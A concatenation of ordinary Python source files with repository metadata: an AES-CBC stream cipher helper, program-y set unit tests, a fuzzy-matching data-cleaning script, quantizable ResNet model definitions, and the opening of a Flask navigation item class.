        self.block_method = self._encrypt_block if is_encrypt else self._decrypt_block
        self.encryptor = AES.new(key, AES.MODE_CBC, iv)
        self.decryptor = AES.new(key, AES.MODE_CBC, iv)
        self.last_block = ''
        self.is_encrypt = is_encrypt
    def process_data(self, data):
        """Accept and process the input 'data' block. Return an 'output' that
        is a modulo of this processor's block size, which may not be evenly
        aligned with the input data's size.
        """
        buff = ''.join([self.last_block, data])
        len_buff = len(buff)
        # Not more than one block buffered yet: hold everything back.
        if len_buff <= self.block_size_bytes:
            self.last_block = buff
            return ''
        len_buff_modulo = len_buff - (len_buff % self.block_size_bytes)
        # Always keep at least one full block in reserve so finish() has
        # material to pad (encrypt side) or un-pad (decrypt side).
        if not len_buff % self.block_size_bytes:
            len_buff_modulo -= self.block_size_bytes
        self.last_block = buff[len_buff_modulo:]
        output = self.block_method(buff[:len_buff_modulo])
        return output
    def finish(self):
        """Indicate that we are finished using this data structure, so need to output based on existing buffer data."""
        if self.is_encrypt:
            # Pad the held-back tail to a full block, then encrypt it.
            output = self._pad(self.last_block)
            output = self.block_method(output)
        else:
            # Decrypt the held-back block(s), then strip the padding.
            # NOTE(review): an empty last_block would make _strip_pad() call
            # ord('') and raise -- assumes at least one block was buffered.
            output = self.block_method(self.last_block)
            output = self._strip_pad(output)
        self.last_block = ''
        return output
    def _encrypt_block(self, block):
        # CBC chaining state lives inside self.encryptor across calls.
        block = self.encryptor.encrypt(block)
        return block
    def _decrypt_block(self, block):
        return self.decryptor.decrypt(block)
    def _pad(self, unencrypted):
        """Adds padding to unencrypted byte string."""
        # PKCS#7-style: pad length is 1..block_size and each pad char
        # encodes that length.
        pad_length = self.block_size_bytes - (
            len(unencrypted) % self.block_size_bytes
        )
        return unencrypted + (chr(pad_length) * pad_length)
    def _strip_pad(self, unencrypted):
        """Remove the padding by reading its length from the final character."""
        pad_length = ord(unencrypted[-1:])
        unpadded = unencrypted[:-pad_length]
        return unpadded
| 40.283237 | 119 | 0.62735 |
ace8cb9c0d4537b36303139a501701b8b45bc1e3 | 4,812 | py | Python | test/programytest/mappings/test_sets.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:13:45.000Z | 2018-09-01T20:00:55.000Z | test/programytest/mappings/test_sets.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 1 | 2018-09-12T18:30:17.000Z | 2018-09-12T18:30:17.000Z | test/programytest/mappings/test_sets.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:08:36.000Z | 2018-09-23T06:11:04.000Z | import unittest
import os
from programy.mappings.sets import SetCollection
from programy.storage.factory import StorageFactory
from programy.storage.stores.file.config import FileStorageConfiguration
from programy.storage.stores.file.engine import FileStorageEngine
from programy.storage.stores.file.config import FileStoreConfiguration
class SetTests(unittest.TestCase):
    """Unit tests for SetCollection: in-memory add/remove/empty operations
    plus loading and reloading set definitions from file storage."""
    def _create_storage_factory(self):
        """Build a StorageFactory whose sets storage reads from the local
        test_files/sets directory."""
        storage_factory = StorageFactory()
        file_store_config = FileStorageConfiguration()
        file_store_config._sets_storage = FileStoreConfiguration(dirs=[os.path.dirname(__file__) + os.sep + "test_files" + os.sep + "sets"])
        storage_engine = FileStorageEngine(file_store_config)
        storage_factory._storage_engines[StorageFactory.SETS] = storage_engine
        storage_factory._store_to_engine_map[StorageFactory.SETS] = storage_engine
        return storage_factory
    def _assert_test_set_loaded(self, collection):
        """Assert that exactly the TEST_SET set was loaded and that it
        contains the expected 'AIR' entry."""
        self.assertIsNotNone(collection._sets)
        self.assertEqual(len(collection._sets), 1)
        self.assertIsNotNone(collection._stores)
        self.assertEqual(len(collection._stores), 1)
        self.assertTrue("TEST_SET" in collection._sets)
        self.assertTrue("TEST_SET" in collection._stores)
        self.assertTrue(collection.contains('TEST_SET'))
        aset = collection.set('TEST_SET')
        self.assertIsNotNone(aset)
        self.assertTrue(['Air', 'Force', 'blue'] in aset['AIR'])
    def test_initialise_collection(self):
        collection = SetCollection()
        self.assertIsNotNone(collection)
        self.assertIsNotNone(collection.sets)
        self.assertIsNotNone(collection.stores)
    def test_collection_operations(self):
        collection = SetCollection()
        collection.add_set("TESTSET", {"A": [["A", "B", "C"]], "D": [["D"]], "E": [["E", "F"]]}, "teststore")
        collection.add_set("TESTSET2", {"1": [["1", "2", "3"]], "4": [["4"]], "5": [["5", "6"]]}, "teststore")
        self.assertIsNotNone(collection.sets)
        self.assertIsNotNone(collection.stores)
        self.assertTrue(collection.contains("TESTSET"))
        self.assertTrue(collection.contains("TESTSET2"))
        self.assertFalse(collection.contains("TESTSET3"))
        self.assertEqual(collection.store_name("TESTSET"), "teststore")
        aset = collection.set("TESTSET")
        self.assertIsNotNone(aset)
        self.assertEqual(6, collection.count_words_in_sets())
        collection.remove("TESTSET2")
        self.assertTrue(collection.contains("TESTSET"))
        self.assertFalse(collection.contains("TESTSET2"))
        self.assertFalse(collection.contains("TESTSET3"))
        collection.empty()
        self.assertIsNotNone(collection.sets)
        self.assertIsNotNone(collection.stores)
        self.assertFalse(collection.contains("TESTSET"))
        self.assertIsNone(collection.set("TESTSET"))
        # assertNotEqual, not the deprecated assertNotEquals alias.
        self.assertNotEqual(collection.store_name("TESTSET"), "teststore")
    def test_load_from_file(self):
        storage_factory = self._create_storage_factory()
        collection = SetCollection()
        self.assertIsNotNone(collection)
        collection.load(storage_factory)
        self._assert_test_set_loaded(collection)
    def test_reload_from_file(self):
        storage_factory = self._create_storage_factory()
        collection = SetCollection()
        self.assertIsNotNone(collection)
        collection.load(storage_factory)
        self._assert_test_set_loaded(collection)
        # Reloading the same set must leave the collection contents intact.
        collection.reload(storage_factory, "TEST_SET")
        self._assert_test_set_loaded(collection)
| 37.302326 | 140 | 0.693682 |
ace8cbe2d4c4184c41e9dffaffce0be1fac37820 | 1,950 | py | Python | Data Cleaning/Class 5 - Inconsistent Data Entry.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Data Cleaning/Class 5 - Inconsistent Data Entry.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Data Cleaning/Class 5 - Inconsistent Data Entry.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | # Inconsistent Data Entry
import pandas as pd
import numpy as np
import fuzzywuzzy
from fuzzywuzzy import process
import chardet
### read in all our data
professors = pd.read_csv("../Data/Pakistan Intellectual Capital.csv")
### get all the unique values in the 'Country' column
countries = professors['Country'].unique()
### sort them alphabetically and then take a closer look
countries.sort()
### normalise entries: convert to lower case
professors['Country'] = professors['Country'].str.lower()
### remove leading and trailing white space (str.strip trims both ends)
professors['Country'] = professors['Country'].str.strip()
### re-read the unique values now that the column has been normalised
countries = professors['Country'].unique()
### get the top 10 closest fuzzy matches to "south korea" (token-sort ratio)
matches = fuzzywuzzy.process.extract("south korea", countries, limit=10, scorer=fuzzywuzzy.fuzz.token_sort_ratio)
### function to replace rows in the provided column of the provided dataframe
### that match the provided string above the provided ratio with the provided string
def replace_matches_in_column(df, column, string_to_match, min_ratio=47):
    """Canonicalise near-duplicate values of ``df[column]`` in place.

    Fuzzy-matches every unique value of the column against
    ``string_to_match`` (token-sort ratio, top 10 candidates) and rewrites
    the rows whose score is >= ``min_ratio``. Prints "All done!" on completion.
    """
    ### get a list of unique strings
    strings = df[column].unique()
    ### get the top 10 closest matches to our input string
    ### (renamed from `matches` -- the original shadowed both its own loop
    ### variable and the module-level `matches`)
    candidates = fuzzywuzzy.process.extract(string_to_match, strings, limit=10, scorer=fuzzywuzzy.fuzz.token_sort_ratio)
    ### keep only the matched strings whose score clears min_ratio
    ### (the original comment claimed "ratio > 90"; the cut-off is min_ratio)
    close_matches = [match for match, score in candidates if score >= min_ratio]
    ### boolean mask of the rows holding one of the close matches
    rows_with_matches = df[column].isin(close_matches)
    ### replace all those rows with the canonical string
    df.loc[rows_with_matches, column] = string_to_match
    ### let us know the function's done
    print("All done!")
### apply the fuzzy replacement so close variants of "south korea" are unified
replace_matches_in_column(df=professors, column='Country', string_to_match="south korea")
| 36.111111 | 117 | 0.745641 |
ace8cc9b39a44d1eb0cf07cc2a3be83874aa9288 | 19,528 | py | Python | tools/pytorch-quantization/model/resnet.py | malithj/TensorRT | 48605d4b5673df89110cf41249ad007259d7c34a | [
"Apache-2.0"
] | null | null | null | tools/pytorch-quantization/model/resnet.py | malithj/TensorRT | 48605d4b5673df89110cf41249ad007259d7c34a | [
"Apache-2.0"
] | null | null | null | tools/pytorch-quantization/model/resnet.py | malithj/TensorRT | 48605d4b5673df89110cf41249ad007259d7c34a | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import torch
from torch import Tensor
import torch.nn as nn
from torch.hub import load_state_dict_from_url
from typing import Type, Any, Callable, Union, List, Optional
from pytorch_quantization import quant_modules
from pytorch_quantization import nn as quant_nn
# Public API of this module: the ResNet class plus one factory per architecture.
__all__ = [
    'ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
    'wide_resnet50_2', 'wide_resnet101_2'
]
# Download URLs of the torchvision pre-trained weights, keyed by the
# architecture name passed to `_resnet`.
model_urls = {
    'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
    'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
    'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
    'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
    'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
    'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
    'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
    'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
    'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes: int,
            out_planes: int,
            stride: int = 1,
            groups: int = 1,
            dilation: int = 1,
            quantize: bool = False) -> nn.Conv2d:
    """Return a 3x3 convolution with padding and no bias.

    Builds a ``quant_nn.QuantConv2d`` when ``quantize`` is True, otherwise a
    plain ``nn.Conv2d``; all other construction arguments are identical.
    """
    conv_cls = quant_nn.QuantConv2d if quantize else nn.Conv2d
    return conv_cls(in_planes,
                    out_planes,
                    kernel_size=3,
                    stride=stride,
                    padding=dilation,
                    groups=groups,
                    bias=False,
                    dilation=dilation)
def conv1x1(in_planes: int, out_planes: int, stride: int = 1, quantize: bool = False) -> nn.Conv2d:
    """Return a 1x1 convolution without bias (quantized variant when ``quantize``)."""
    conv_cls = quant_nn.QuantConv2d if quantize else nn.Conv2d
    return conv_cls(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
    """ResNet basic residual block: two 3x3 convolutions plus a shortcut.

    When ``quantize`` is True the convolutions are QuantConv2d modules and the
    shortcut tensor passes through a TensorQuantizer before the residual add.
    """
    expansion: int = 1
    def __init__(self,
                 inplanes: int,
                 planes: int,
                 stride: int = 1,
                 downsample: Optional[nn.Module] = None,
                 groups: int = 1,
                 base_width: int = 64,
                 dilation: int = 1,
                 norm_layer: Optional[Callable[..., nn.Module]] = None,
                 quantize: bool = False) -> None:
        super(BasicBlock, self).__init__()
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        # BasicBlock has no bottleneck width to rescale, so grouped / widened
        # variants are rejected outright.
        if groups != 1 or base_width != 64:
            raise ValueError(
                'BasicBlock only supports groups=1 and base_width=64')
        if dilation > 1:
            raise NotImplementedError(
                "Dilation > 1 not supported in BasicBlock")
        # Both self.conv1 and self.downsample downsample the input when
        # stride != 1. Submodules are registered in the reference order.
        self.conv1 = conv3x3(inplanes, planes, stride, quantize=quantize)
        self.bn1 = norm_layer(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes, quantize=quantize)
        self.bn2 = norm_layer(planes)
        self.downsample = downsample
        self.stride = stride
        self._quantize = quantize
        if self._quantize:
            self.residual_quantizer = quant_nn.TensorQuantizer(
                quant_nn.QuantConv2d.default_quant_desc_input)
    def forward(self, x: Tensor) -> Tensor:
        # Shortcut branch: optionally downsampled, optionally fake-quantized.
        shortcut = x if self.downsample is None else self.downsample(x)
        if self._quantize:
            shortcut = self.residual_quantizer(shortcut)
        # Main branch: conv-bn-relu, conv-bn, then residual add and relu.
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out += shortcut
        return self.relu(out)
class Bottleneck(nn.Module):
    """ResNet bottleneck block (1x1 reduce, 3x3, 1x1 expand) with shortcut.

    Bottleneck in torchvision places the stride for downsampling at the 3x3
    convolution (self.conv2), while the original paper
    ("Deep residual learning for image recognition",
    https://arxiv.org/abs/1512.03385) places it at the first 1x1 convolution
    (self.conv1). This variant is also known as ResNet V1.5 and improves
    accuracy according to
    https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.
    When ``quantize`` is True the convolutions are QuantConv2d modules and the
    shortcut tensor passes through a TensorQuantizer before the residual add.
    """
    expansion: int = 4
    def __init__(self,
                 inplanes: int,
                 planes: int,
                 stride: int = 1,
                 downsample: Optional[nn.Module] = None,
                 groups: int = 1,
                 base_width: int = 64,
                 dilation: int = 1,
                 norm_layer: Optional[Callable[..., nn.Module]] = None,
                 quantize: bool = False) -> None:
        super(Bottleneck, self).__init__()
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        # Width of the middle 3x3 conv, rescaled for wide / grouped variants.
        width = int(planes * (base_width / 64.)) * groups
        # Both self.conv2 and self.downsample downsample the input when
        # stride != 1. Submodules are registered in the reference order.
        self.conv1 = conv1x1(inplanes, width, quantize=quantize)
        self.bn1 = norm_layer(width)
        self.conv2 = conv3x3(width, width, stride, groups,
                             dilation, quantize=quantize)
        self.bn2 = norm_layer(width)
        self.conv3 = conv1x1(width, planes * self.expansion, quantize=quantize)
        self.bn3 = norm_layer(planes * self.expansion)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride
        self._quantize = quantize
        if self._quantize:
            self.residual_quantizer = quant_nn.TensorQuantizer(
                quant_nn.QuantConv2d.default_quant_desc_input)
    def forward(self, x: Tensor) -> Tensor:
        # Shortcut branch: optionally downsampled, optionally fake-quantized.
        shortcut = x if self.downsample is None else self.downsample(x)
        if self._quantize:
            shortcut = self.residual_quantizer(shortcut)
        # Main branch: 1x1 reduce, 3x3, 1x1 expand, residual add, final relu.
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        out += shortcut
        return self.relu(out)
class ResNet(nn.Module):
    """ResNet backbone with optional fake quantization.

    When ``quantize`` is True, the stem convolution and the final fully
    connected layer are built from ``pytorch_quantization`` modules
    (QuantConv2d / QuantLinear) and the flag is forwarded to every residual
    block; otherwise the standard ``torch.nn`` layers are used.

    Args:
        block: residual block class (BasicBlock or Bottleneck).
        layers: number of blocks in each of the four stages.
        quantize: build quantized layers when True.
        num_classes: output size of the final classification layer.
        zero_init_residual: zero-init the last BN of each residual block.
        groups, width_per_group: grouped-convolution knobs (ResNeXt / wide).
        replace_stride_with_dilation: per-stage flags replacing stride-2
            downsampling with dilation (must have 3 entries or be None).
        norm_layer: normalization layer factory; defaults to nn.BatchNorm2d.
    """
    def __init__(self,
                 block: Type[Union[BasicBlock, Bottleneck]],
                 layers: List[int],
                 quantize: bool = False,
                 num_classes: int = 1000,
                 zero_init_residual: bool = False,
                 groups: int = 1,
                 width_per_group: int = 64,
                 replace_stride_with_dilation: Optional[List[bool]] = None,
                 norm_layer: Optional[Callable[..., nn.Module]] = None) -> None:
        super(ResNet, self).__init__()
        self._quantize = quantize
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        self._norm_layer = norm_layer
        # Channel count entering the next stage; mutated by _make_layer.
        self.inplanes = 64
        self.dilation = 1
        if replace_stride_with_dilation is None:
            # each element in the tuple indicates if we should replace
            # the 2x2 stride with a dilated convolution instead
            replace_stride_with_dilation = [False, False, False]
        if len(replace_stride_with_dilation) != 3:
            raise ValueError("replace_stride_with_dilation should be None "
                             "or a 3-element tuple, got {}".format(replace_stride_with_dilation))
        self.groups = groups
        self.base_width = width_per_group
        # Stem: 7x7 stride-2 convolution (quantized variant when requested).
        if quantize:
            self.conv1 = quant_nn.QuantConv2d(3,
                                              self.inplanes,
                                              kernel_size=7,
                                              stride=2,
                                              padding=3,
                                              bias=False)
        else:
            self.conv1 = nn.Conv2d(
                3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
        self.bn1 = norm_layer(self.inplanes)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        # Four residual stages; note _make_layer mutates self.inplanes, so
        # the call order below matters.
        self.layer1 = self._make_layer(block, 64, layers[0], quantize=quantize)
        self.layer2 = self._make_layer(block,
                                       128,
                                       layers[1],
                                       stride=2,
                                       dilate=replace_stride_with_dilation[0],
                                       quantize=quantize)
        self.layer3 = self._make_layer(block,
                                       256,
                                       layers[2],
                                       stride=2,
                                       dilate=replace_stride_with_dilation[1],
                                       quantize=quantize)
        self.layer4 = self._make_layer(block,
                                       512,
                                       layers[3],
                                       stride=2,
                                       dilate=replace_stride_with_dilation[2],
                                       quantize=quantize)
        # Classification head: global average pool then linear layer.
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        if quantize:
            self.fc = quant_nn.QuantLinear(512 * block.expansion, num_classes)
        else:
            self.fc = nn.Linear(512 * block.expansion, num_classes)
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(
                    m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
        # Zero-initialize the last BN in each residual branch,
        # so that the residual branch starts with zeros, and each residual block behaves like an identity.
        # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
        if zero_init_residual:
            for m in self.modules():
                if isinstance(m, Bottleneck):
                    # type: ignore[arg-type]
                    nn.init.constant_(m.bn3.weight, 0)
                elif isinstance(m, BasicBlock):
                    # type: ignore[arg-type]
                    nn.init.constant_(m.bn2.weight, 0)
    def _make_layer(self,
                    block: Type[Union[BasicBlock, Bottleneck]],
                    planes: int,
                    blocks: int,
                    stride: int = 1,
                    dilate: bool = False,
                    quantize: bool = False) -> nn.Sequential:
        """Build one residual stage of `blocks` blocks.

        Only the first block may downsample (stride/1x1 projection); the
        remaining blocks keep the resolution. Side effect: updates
        self.inplanes (and self.dilation when `dilate`) for the next stage.
        """
        norm_layer = self._norm_layer
        downsample = None
        previous_dilation = self.dilation
        if dilate:
            self.dilation *= stride
            stride = 1
        # A projection shortcut is needed whenever the shape of the residual
        # branch output differs from the block input.
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                conv1x1(self.inplanes, planes * block.expansion,
                        stride, quantize=quantize),
                norm_layer(planes * block.expansion),
            )
        layers = []
        layers.append(
            block(self.inplanes, planes, stride, downsample, self.groups, self.base_width, previous_dilation,
                  norm_layer, self._quantize))
        self.inplanes = planes * block.expansion
        for _ in range(1, blocks):
            layers.append(
                block(self.inplanes,
                      planes,
                      groups=self.groups,
                      base_width=self.base_width,
                      dilation=self.dilation,
                      norm_layer=norm_layer,
                      quantize=quantize))
        return nn.Sequential(*layers)
    def _forward_impl(self, x: Tensor) -> Tensor:
        # See note [TorchScript super()]
        # Stem -> four stages -> pooled features -> logits.
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        x = torch.flatten(x, 1)
        x = self.fc(x)
        return x
    def forward(self, x: Tensor) -> Tensor:
        """Run a forward pass; returns logits of shape (batch, num_classes)."""
        return self._forward_impl(x)
def _resnet(arch: str, block: Type[Union[BasicBlock, Bottleneck]], layers: List[int], pretrained: bool, progress: bool,
            quantize: bool, **kwargs: Any) -> ResNet:
    """Construct a ResNet and optionally load torchvision pre-trained weights."""
    model = ResNet(block, layers, quantize, **kwargs)
    if not pretrained:
        return model
    state_dict = load_state_dict_from_url(
        model_urls[arch], progress=progress)
    model.load_state_dict(state_dict)
    return model
def resnet18(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""ResNet-18 model from
    `"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress, quantize, **kwargs)
def resnet34(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""ResNet-34 model from
    `"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def resnet50(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""ResNet-50 model from
    `"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def resnet101(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""ResNet-101 model from
    `"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress, quantize, **kwargs)
def resnet152(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""ResNet-152 model from
    `"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress, quantize, **kwargs)
def resnext50_32x4d(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""ResNeXt-50 32x4d model from
    `"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    # 32 groups of width 4 give the "32x4d" cardinality of the paper.
    kwargs['groups'] = 32
    kwargs['width_per_group'] = 4
    return _resnet('resnext50_32x4d', Bottleneck, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def resnext101_32x8d(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""ResNeXt-101 32x8d model from
    `"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    # 32 groups of width 8 give the "32x8d" cardinality of the paper.
    kwargs['groups'] = 32
    kwargs['width_per_group'] = 8
    return _resnet('resnext101_32x8d', Bottleneck, [3, 4, 23, 3], pretrained, progress, quantize, **kwargs)
def wide_resnet50_2(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""Wide ResNet-50-2 model from
    `"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
    The model is the same as ResNet except for the bottleneck number of channels
    which is twice larger in every block. The number of channels in outer 1x1
    convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
    channels, and in Wide ResNet-50-2 has 2048-1024-2048.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    # Doubling the base width doubles the 3x3 bottleneck channels.
    kwargs['width_per_group'] = 64 * 2
    return _resnet('wide_resnet50_2', Bottleneck, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def wide_resnet101_2(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
    r"""Wide ResNet-101-2 model from
    `"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
    The model is the same as ResNet except for the bottleneck number of channels
    which is twice larger in every block. The number of channels in outer 1x1
    convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
    channels, and in Wide ResNet-50-2 has 2048-1024-2048.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
        quantize (bool): If True, builds the model with quantized conv/linear layers
    """
    # Doubling the base width doubles the 3x3 bottleneck channels.
    kwargs['width_per_group'] = 64 * 2
    return _resnet('wide_resnet101_2', Bottleneck, [3, 4, 23, 3], pretrained, progress, quantize, **kwargs)
| 41.372881 | 119 | 0.589154 |
ace8ccb326ffa003444a05f94bdf596bc491ad16 | 6,205 | py | Python | flask_navigator/item.py | tonicbupt/flask-navigator | 7bff981e130b648068e23849141ddb800391f3ec | [
"MIT"
] | null | null | null | flask_navigator/item.py | tonicbupt/flask-navigator | 7bff981e130b648068e23849141ddb800391f3ec | [
"MIT"
] | 1 | 2015-05-12T11:50:05.000Z | 2015-05-12T11:50:05.000Z | flask_navigator/item.py | tonicbupt/flask-navigator | 7bff981e130b648068e23849141ddb800391f3ec | [
"MIT"
] | null | null | null | import collections
from flask import url_for, request
from .utils import freeze_dict
class Item(object):
    """The navigation item object.

    :param label: the display label of this navigation item.
    :param endpoint: the unique name of this navigation item.
                     If this item points to an internal url, this parameter
                     should be acceptable for ``url_for``, which will generate
                     the target url.
    :param args: optional. If provided, it will be passed to ``url_for``
                 together with ``endpoint``. If the arguments need to be
                 decided inside the Flask app context, this parameter may be
                 a function to delay the evaluation.
    :param url: optional. If provided, the target url of this navigation item
                will be it; ``endpoint`` and ``args`` will not be used to
                generate the url.
    :param sub_nav_bar: optional. A nested navigation bar (or a list of bars)
                        under this item; used by :attr:`is_active`.

    The ``endpoint`` is the identity name of this navigation item. It must be
    unique in the whole application. In most situations, it should be the
    endpoint name of a Flask view function.
    """
    def __init__(self, label, endpoint, args=None, url=None, sub_nav_bar=None):
        self.label = label
        self.endpoint = endpoint
        self._args = args
        self._url = url
        if sub_nav_bar:
            # Normalize a single navigation bar into a one-element list.
            if not isinstance(sub_nav_bar, list):
                sub_nav_bar = [sub_nav_bar, ]
            self._sub_nav_bar = sub_nav_bar
        else:
            self._sub_nav_bar = []
    @property
    def args(self):
        """The arguments which will be passed to ``url_for``.

        A callable ``args`` is invoked lazily so its values can depend on the
        Flask app context. Always returns a fresh dict.

        :type: :class:`dict`
        """
        if self._args is None:
            return {}
        if callable(self._args):
            return dict(self._args())
        return dict(self._args)
    @property
    def url(self):
        """The final url of this navigation item.

        By default, the value is generated from :attr:`self.endpoint` and
        :attr:`self.args`.

        .. note::

           The :attr:`url` property requires the app context without a
           provided config value :const:`SERVER_NAME`, because of
           :func:`flask.url_for`.

        :type: :class:`str`
        """
        if self._url is None:
            return url_for(self.endpoint, **self.args)
        return self._url
    @property
    def is_active(self):
        """Whether this item (or any item in its sub navigation bars) matches
        the current request."""
        return self._is_self_active() or self._is_sub_nav_bar_item_active()
    def _is_self_active(self):
        # Simply test if self is active: an internal item matching the current
        # request's endpoint and view arguments. Sub navigators are ignored.
        is_internal = (self._url is None)
        has_same_endpoint = (request.endpoint == self.endpoint)
        has_same_args = (request.view_args == self.args)
        return is_internal and has_same_endpoint and has_same_args
    def _is_sub_nav_bar_item_active(self):
        # If no sub navigators are bound to self, `is_active` depends only on
        # self._is_self_active, so simply return False.
        if not self._sub_nav_bar:
            return False
        # If any sub navigators are bound, self is the parent of all of them:
        # it is active whenever any nested item is active.
        # (Uses a generator so evaluation short-circuits on the first hit,
        # instead of materializing a list of every item's state.)
